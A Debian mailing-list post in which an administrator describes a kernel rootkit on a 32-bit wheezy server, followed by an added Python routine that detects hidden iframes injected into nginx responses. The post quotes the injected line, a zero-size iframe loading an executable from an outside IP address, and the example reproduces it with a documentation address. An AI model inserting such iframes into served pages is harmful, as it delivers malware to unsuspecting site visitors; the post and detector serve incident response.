Last fall there was a Debian 64-bit / nginx rootkit going around; now I've been hit with what sounds similar but on 32-bit wheezy.

Here's a link to info on the previous 64-bit rootkit:
https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections

All files served by nginx have this line inserted at the top:

<iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>

Whatever it was isn't there anymore:
Connecting to 122.226.137.123:1111... failed: Connection refused.

I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another Debian Wheezy i386 machine in a safe environment and did a diff -r. No difference.

No insmod line in /etc/rc.local.

I haven't been able to find anything. Googling doesn't show anything similar for Debian wheezy i386, only squeeze 64-bit.

I was using nginx-light from dotdeb.org. I uninstalled nginx and tried the nginx-light from Debian wheezy but it made no difference.

This machine was built on July 19th.

I've uninstalled nginx. I'll hold off rebuilding for now, maybe somebody here has some ideas?

E Frank Ball fra...@efball.com

Archive: http://lists.debian.org/20130911224820.gf30...@kamajii.efball.com
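Added example, not part of the original message: a check for the symptom reported above, where the response nginx serves carries a zero-size iframe that the file on disk does not. The function name, the report fields and the sample bytes are assumptions made for illustration; the sample data is constructed.

```python
import re

# An iframe tag made invisible by a zero width or height (quoted or unquoted).
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s>/])[^>]*>",
    re.IGNORECASE,
)

def find_injection(on_disk: bytes, served: bytes) -> dict:
    """Compare a file's bytes on disk with the decoded HTTP body a client received.

    `served` must already be de-chunked and decompressed; fetching it is out of
    scope here so the example runs offline.
    """
    report = {"modified": served != on_disk, "prefix": b"", "hidden_iframes": []}
    # Content prepended in flight: the served body ends with the original file.
    if len(served) > len(on_disk) and served.endswith(on_disk):
        report["prefix"] = served[: len(served) - len(on_disk)]
    # Hidden iframes that exist only in the served copy, not in the file itself.
    known = {m.group(0) for m in HIDDEN_IFRAME.finditer(on_disk)}
    report["hidden_iframes"] = [
        m.group(0) for m in HIDDEN_IFRAME.finditer(served) if m.group(0) not in known
    ]
    return report

# Constructed sample data (203.0.113.0/24 is a documentation address range).
SAMPLE_DISK = b"<html><body><iframe width=560 height=315 src=/v.html></iframe></body></html>\n"
SAMPLE_SERVED = (
    b"<iframe src= http://203.0.113.7:1111/sample.bin width=0 height=0></iframe>\n"
    + SAMPLE_DISK
)

if __name__ == "__main__":
    for name, body in (("clean", SAMPLE_DISK), ("tampered", SAMPLE_SERVED)):
        print(name, find_injection(SAMPLE_DISK, body))
```

A non-empty prefix with unchanged files on disk means the modification happens between the file read and the wire, which is consistent with the on-disk comparison in the message finding no difference.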